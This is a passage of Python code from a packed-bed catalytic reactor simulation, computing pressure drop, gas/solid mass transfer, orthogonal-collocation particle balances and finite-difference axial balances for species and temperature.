# gas density [kg/m^3]
GaDe0 = constBC1['GaDe0']
# heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
GaCpMeanMix0 = constBC1['GaCpMeanMix0']
# gas thermal conductivity [J/s.m.K]
GaThCoMix0 = constBC1['GaThCoMix0']
# mesh setting
meshSetting = FunParam['meshSetting']
# mesh installment
solverMesh = meshSetting['solverMesh']
# mesh refinement
solverMeshSet = meshSetting['solverMeshSet']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# dzs [m]/[-]
dzs = meshSetting['dzs']
# z ratio
zR = meshSetting['zR']
# number of nodes in the dense and normal sections
zNoNo = meshSetting['zNoNo']
# dense
zNoNoDense = zNoNo[0]
# normal
zNoNoNormal = zNoNo[1]
# solver setting
solverSetting = FunParam['solverSetting']
# mass balance equation
DIFF1_C_SET = solverSetting['dFdz']
DIFF2_C_SET_BC1 = solverSetting['d2Fdz2']['BC1']
DIFF2_C_SET_BC2 = solverSetting['d2Fdz2']['BC2']
DIFF2_C_SET_G = solverSetting['d2Fdz2']['G']
# energy balance equation
DIFF1_T_SET = solverSetting['dTdz']
DIFF2_T_SET_BC1 = solverSetting['d2Tdz2']['BC1']
DIFF2_T_SET_BC2 = solverSetting['d2Tdz2']['BC2']
DIFF2_T_SET_G = solverSetting['d2Tdz2']['G']
# number of collocation points
ocN = solverSetting['OrCoClassSetRes']['N']
ocXc = solverSetting['OrCoClassSetRes']['Xc']
ocA = solverSetting['OrCoClassSetRes']['A']
ocB = solverSetting['OrCoClassSetRes']['B']
ocQ = solverSetting['OrCoClassSetRes']['Q']
# init OrCoCatParticle
OrCoCatParticleClassSet = OrCoCatParticleClass(
ocXc, ocN, ocQ, ocA, ocB, varNo)
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# dimensionless analysis params
# feed concentration [kmol/m^3]
Cif = DimensionlessAnalysisParams['Cif']
# feed temperature
Tf = DimensionlessAnalysisParams['Tf']
# feed superficial velocity [m/s]
vf = DimensionlessAnalysisParams['vf']
# domain length [m]
zf = DimensionlessAnalysisParams['zf']
# particle radius [m]
rf = DimensionlessAnalysisParams['rf']
# diffusivity coefficient of component [m^2/s]
Dif = DimensionlessAnalysisParams['Dif']
# feed heat capacity at constant pressure
Cpif = DimensionlessAnalysisParams['Cpif']
# feed mass convective term of gas phase [kmol/m^3.s]
GaMaCoTe0 = DimensionlessAnalysisParams['GaMaCoTe0']
# feed mass diffusive term of gas phase [kmol/m^3.s]
GaMaDiTe0 = DimensionlessAnalysisParams['GaMaDiTe0']
# feed heat convective term of gas phase [kJ/m^3.s]
GaHeCoTe0 = DimensionlessAnalysisParams['GaHeCoTe0']
# feed heat diffusive term of gas phase [kJ/m^3.s]
GaHeDiTe0 = DimensionlessAnalysisParams['GaHeDiTe0']
# feed mass diffusive term of solid phase [kmol/m^3.s]
SoMaDiTe0 = DimensionlessAnalysisParams['SoMaDiTe0']
# feed heat diffusive term of solid phase [kJ/m^3.s]
SoHeDiTe0 = DimensionlessAnalysisParams['SoHeDiTe0']
# Reynolds number
ReNu = DimensionlessAnalysisParams['ReNu0']
# Schmidt number
ScNu = DimensionlessAnalysisParams['ScNu0']
# Sherwood number
ShNu = DimensionlessAnalysisParams['ShNu0']
# Prandtl number
PrNu = DimensionlessAnalysisParams['PrNu0']
# mass Peclet number
PeNuMa0 = DimensionlessAnalysisParams['PeNuMa0']
# heat Peclet number
PeNuHe0 = DimensionlessAnalysisParams['PeNuHe0']
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = DimensionlessAnalysisParams['MaTrCo']
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = DimensionlessAnalysisParams['HeTrCo']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# interstitial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# superficial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# effective heat capacity at constant pressure
SoCpMeanMixEff = np.zeros(rNo)
# dimensionless analysis
SoCpMeanMixEff_ReVa = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [kmol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# dimensionless analysis
CoSpi_ReVa = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# dimensionless analysis
CosSpi_r_ReVa = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer - 1]
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CoSpi_ReVa[i] = rmtUtil.calRealDiLessValue(
CoSpi[i], SpCoi0_Set)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# dimensionless analysis: real value
CoSp_ReVa = np.sum(CoSpi_ReVa)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
CosSpi_r[r][i] = max(_CosSpi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_r_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CosSpi_r_ReVa[r][i] = rmtUtil.calRealDiLessValue(
CosSpi_r[r][i], SpCoi0_r_Set)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# dimensionless analysis: real value
CosSp_r_ReVa = np.sum(CosSpi_r_ReVa, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# dimensionless analysis
CosSpi_cat_DiLeVa = CosSpi_r[0, :]
# temperature [K]
T = T_z[z]
T_ReVa = rmtUtil.calRealDiLessValue(T, T0, "TEMP")
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
Ts_r_ReVa = rmtUtil.calRealDiLessValue(Ts_r, T0, "TEMP")
# pressure [Pa]
P = P_z[z]
# FIXME
# velocity
# dimensionless value
# v = v_z[z]
v = 1
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi_ReVa))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r_ReVa)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# dimensionless analysis
SuGaVe_ReVa = rmtUtil.calRealDiLessValue(SuGaVe, SuGaVe0)
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = calMolarFlowRate(CoSp_ReVa, SuGaVe_ReVa, CrSeAr)
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp_ReVa*1000)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# dimensionless value
GaDe_DiLeVa = rmtUtil.calDiLessValue(GaDe, GaDe0)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe_ReVa/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe_ReVa**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
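# NOTE
# the four terms above assemble the Ergun correlation for packed beds,
# dP/dz = -[150*mu*v*(1-eps)^2/(dp^2*eps^3) + 1.75*rho*v^2*(1-eps)/(dp*eps^3)],
# and the pressure profile is marched forward with an explicit Euler step,
# P[z+1] = P[z] + (dP/dz)*dz, rather than being treated as an ODE state.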
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVii = GaVii0 if MODEL_SETTING['GaVii'] == "FIX" else calTest()
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
# FIXME
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# solid gas thermal conductivity
SoThCoMix0 = GaThCoMix0
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = GaThCoi0 if MODEL_SETTING['GaThCoi'] == "FIX" else calTest(
)
# dimensionless
GaThCoi_DiLe = GaThCoi/GaThCoi0
# FIXME
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix = GaThCoMix0
# dimensionless analysis
GaThCoMix_DiLeVa = GaThCoMix/GaThCoMix0
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = GaThCoMix0
# dimensionless analysis
SoThCoMix_DiLeVa = SoThCoMix/SoThCoMix0
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# dimensionless analysis
GaThCoEff_DiLeVa = BeVoFr*GaThCoMix_DiLeVa
# FIXME
# effective thermal conductivity - solid phase [J/s.m.K]
# assume identical to gas phase
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
# SoThCoEff = SoThCoMix*((1 - CaPo)/CaTo)
SoThCoEff = CaPo*SoThCoMix
# dimensionless analysis
# SoThCoEff_DiLeVa = GaThCoMix_DiLeVa*((1 - CaPo)/CaTo)
SoThCoEff_DiLeVa = CaPo*SoThCoMix_DiLeVa
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
GaDii = GaDii0 if MODEL_SETTING['GaDii'] == "FIX" else calTest()
# dimensionless analysis
GaDii_DiLeVa = GaDii/GaDii0
# effective diffusivity coefficient - gas phase
GaDiiEff = GaDii*BeVoFr
# dimensionless analysis
GaDiiEff_DiLeVa = GaDiiEff/GaDii0
# effective diffusivity - solid phase [m^2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# dimensionless analysis
SoDiiEff_DiLe = (CaPo/CaTo)*GaDii_DiLeVa
# REVIEW
if MODEL_SETTING['MaTrCo'] != "FIX":
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
# loop
loopVars0 = (Ts_r_ReVa[r], P_z[z],
MoFrsi_r[r], CosSpi_r_ReVa[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = r0
# component formation rate [kmol/m^3.s]
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, T_ReVa)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# dimensionless analysis
GaCpMeanMix_DiLeVa = rmtUtil.calDiLessValue(
GaCpMeanMix, GaCpMeanMix0)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# dimensionless analysis
GaCpMeanMixEff_DiLeVa = GaCpMeanMix_DiLeVa*BeVoFr
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff_ReVa[r] = CosSp_r_ReVa[r] * \
SoCpMeanMix[r]*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic reaction (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
if MODEL_SETTING['HeTrCo'] != "FIX":
### dimensionless numbers ###
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
# Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T_ReVa, U, a, 'kJ/m^3.s')
# NOTE
# # mass transfer between
# for i in range(compNo):
# ### gas phase ###
# # mass balance (forward difference)
# # concentration [kmol/m^3]
# # central
# Ci_c = SpCoi_z[i][z]
# # concentration in the catalyst surface [kmol/m^3]
# # CosSpi_cat
# # dimensionless analysis: real value
# Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
# SpCoi0)
# # inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_DiLeVa[i])
# # total mass transfer between gas and solid phases [kmol/m^3]
# ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# # next node
# T_f = T_z[z+1]
# # previous node
# T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
# elif z == zNo - 1:
# # BC2
# # previous node
# T_b = T_z[z - 1]
# # next node
# T_f = 0
# else:
# # interior nodes
# T_b = T_z[z-1]
# # next node
# T_f = T_z[z+1]
# dxdt_v_T = (T_z[z] - T_b)/dz
# # CoSp x 1000
# # OvR x 1000
# dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
# ((1/T_z[z])*dxdt_P - (P_z[z]/T_z[z]**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
# FIXME
# v_z[z+1] = dxdt_v*dz + v_z[z]
# v_z[z+1] = v
# FIXME
v_z[z+1] = v_z[z]
# dimensionless analysis
v_z_DiLeVa = rmtUtil.calDiLessValue(v_z[z+1], vf)
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# bulk temperature [K]
T_c = T_z[z]
# REVIEW
# gas-solid interface BC
# concentration [m/s]*[m^2/s]=[1/m]
# betaC = PaRa*(MaTrCo/SoDiiEff)
# temperature
# betaT = -1*((HeTrCo*PaRa)/SoThCoEff)
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
# concentration [kmol/m^3]
for i in range(compNo):
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# REVIEW
### solid phase ###
# bulk concentration [kmol/m^3]
# Ci_c
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# Cs[0], Cs[1], ...
_Cs_r_Flip = np.flip(_Cs_r)
# dimensionless analysis
# beta
# const
_alpha = rf/GaDii0[i]
_beta = MaTrCo[i]/GaDii_DiLeVa[i]
_Cs_r_interface = _alpha*_beta
_Ri = (1/SoMaDiTe0[i])*(1 - CaPo)*ri_r[:, i]
# updated concentration gas-solid interface
# shape(rNo,1)
_Cs_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Cs_r, Ci_c, _Cs_r_interface)
# # dC/dt list
dCsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Cs_r_Updated, SoDiiEff_DiLe[i], _Ri)
# const
_const1 = CaPo*(rf**2/GaDii0[i])
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[i][r+1][z] = _const2*dCsdti[r]
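# NOTE
# intraparticle mass transport is handled by orthogonal collocation:
# CalUpdateYnSolidGasInterface closes the surface node with the gas/solid
# flux balance, buildOrCoMatrix returns dCs*/dt at the rNo collocation
# points, and the result is scaled by 1/(CaPo*rf^2/Dif) via _const2
# before being stored in rows 1..rNo of the dxdt matrix.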
# concentration [kmol/m^3]
# central
# Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
CosSpi_cat_gas = _Cs_r_Updated[-1]
# dimensionless analysis: real value
Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_gas)
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# NOTE
# BC1 (normal)
BC1_C_1 = PeNuMa0[i]*dz
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC1)
elif z == 0 and solverMeshSet is False:
# NOTE
# BC1 (dense)
# i=0 is discretized based on inlet
# i=1
BC1_C_1 = PeNuMa0[i]*dzs[z]
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dzs[z], DIFF1_C_SET)
# d2Fdz2
# d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1)
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# dCdz = FiDiNonUniformDerivative1(
# dFdz_C, dzs[z], DIFF1_C_SET, zR[z])
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1, _zR_c)
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dCdz = FiDiNonUniformDerivative1(
dFdz_C, dzs[z], DIFF1_C_SET, _zR_b)
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_G, _zR_c)
elif z == zNo - 1:
# NOTE
# BC2
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# forward difference
Ci_f = Ci_b
Ci_ff = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC2)
else:
# NOTE
# normal sections
# interior nodes
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2] if z < zNo-2 else 0
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_G)
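# NOTE
# the branches above select the axial stencil for the species balance:
# at z = 0 the ghost value Ci_b is solved from
# Ci_0 = Ci_b - (1/(Pe*dz))*(Ci_f - Ci_b), which is effectively a
# Danckwerts-type inlet closure; at z = zNo-1 a zero-gradient outlet sets
# Ci_f = Ci_b; interior nodes use central differences, switching to the
# non-uniform forms inside the refined (dense) mesh section.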
# REVIEW
# cal differentiate
# backward difference
# dCdz = (Ci_c - Ci_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*dCdz
# central difference for dispersion
# d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = (BeVoFr*GaDii_DiLeVa[i]/PeNuMa0[i])*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
_inwardFlux = (1/GaMaCoTe0[i])*MoFli_z[i]*SpSuAr
# mass balance
# convective, dispersion, inward flux
# const
_const1 = BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_F = _const2*(_convectiveTerm +
_dispersionFluxC - _inwardFlux)
dxdtMat[i][0][z] = dxdt_F
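# NOTE
# assembled dimensionless species balance (gas phase):
# eps*(zf/vf)*dCi*/dt = -v*dCi*/dz + (eps*Di*/Pe_m)*d2Ci*/dz2
#                       - (1/GaMaCoTe0)*km*av*C_ref*(Ci* - Cs*_surf)
# i.e. accumulation = convection + axial dispersion - gas/solid transfer.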
# NOTE
# energy balance
# bulk temperature [K]
# T_c
# T_c = T_z[z]
# REVIEW
### solid phase ###
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# _Ts_r
# T[n], T[n-1], ..., T[0] => T[0],T[1], ...
_Ts_r_Flip = np.flip(_Ts_r)
# dC/dt list
# convert
# [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = CaPo*SoThCoMix0/1000
# OvHeReT [kJ/m^3.s]
OvHeReT_Conv = -1*OvHeReT
# HeTrCo [J/m^2.s.K] => [kJ/m^2.s.K]
HeTrCo_Conv = HeTrCo/1000
# loop vars
_alpha = rf/SoThCoEff_Conv
_beta = -1*HeTrCo_Conv/SoThCoEff_DiLeVa
_Ts_r_interfaceVar = _alpha*_beta
_H = (1/SoHeDiTe0)*(1 - CaPo)*OvHeReT_Conv
# T[n], T[n-1], ..., T[0]
# updated temperature at the gas-solid interface
_Ts_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Ts_r, T_c, _Ts_r_interfaceVar)
# dTs/dt list
dTsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Ts_r_Updated, SoThCoEff_DiLeVa, _H)
# const
_const1 = SoCpMeanMixEff_ReVa*Tf/SoHeDiTe0
_const2 = 1/_const1
#
for r in range(rNo):
# update
